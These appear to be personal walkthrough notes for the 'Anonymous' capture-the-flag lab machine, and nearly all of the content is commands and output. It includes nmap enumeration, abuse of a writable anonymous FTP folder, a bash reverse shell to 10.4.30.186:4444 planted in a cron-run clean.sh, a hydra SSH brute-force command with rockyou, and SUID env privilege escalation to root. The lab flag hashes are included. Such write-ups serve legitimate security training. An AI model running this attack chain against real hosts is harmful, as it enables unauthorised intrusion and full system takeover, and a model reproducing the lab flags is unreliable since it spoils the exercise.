[Anonymous]
[Enumeration]
[Nmap]
21/tcp   open     ftp            vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.30.186
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp  open     netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
163/tcp  filtered cmip-man
445/tcp  open     netbios-ssn    
Open Ports(21,22,139,163)
[Enum4linux]
#Username Found
Account: namelessone 
[Ftp]
get clean.sh
edit clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
#!/bin/bash
bash -i >& /dev/tcp/10.4.30.186/4444 0>&1
put clean.sh clean.sh 

#Tried hydra but didnt work
[Hydra]
hydra -l namelessone -P /media/kali/save/wordlists/rockyou.txt -V ssh://10.10.54.24

[Revshell]
rlwrap nc -lvp 4444
#cronjob executes at each x0s and x5s
=>wait 5 mins.
namelessone@anonymous:~$ 
#For a more stable shell
$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
Ctrl+Z
stty raw -echo
fg
export TERM=xterm
user.txt:90d6f992585815ff991e68748c414740
[PrivEsc]
Suid Files?: find / -perm -u=s -type f 2>/dev/null
Found: /usr/sbin/env
Link: https://gtfobins.github.io/gtfobins/env/#suid
[Root]
/usr/bin/env /bin/sh -p
Root.txt:4d930091c31a622a7ed10f27999af363
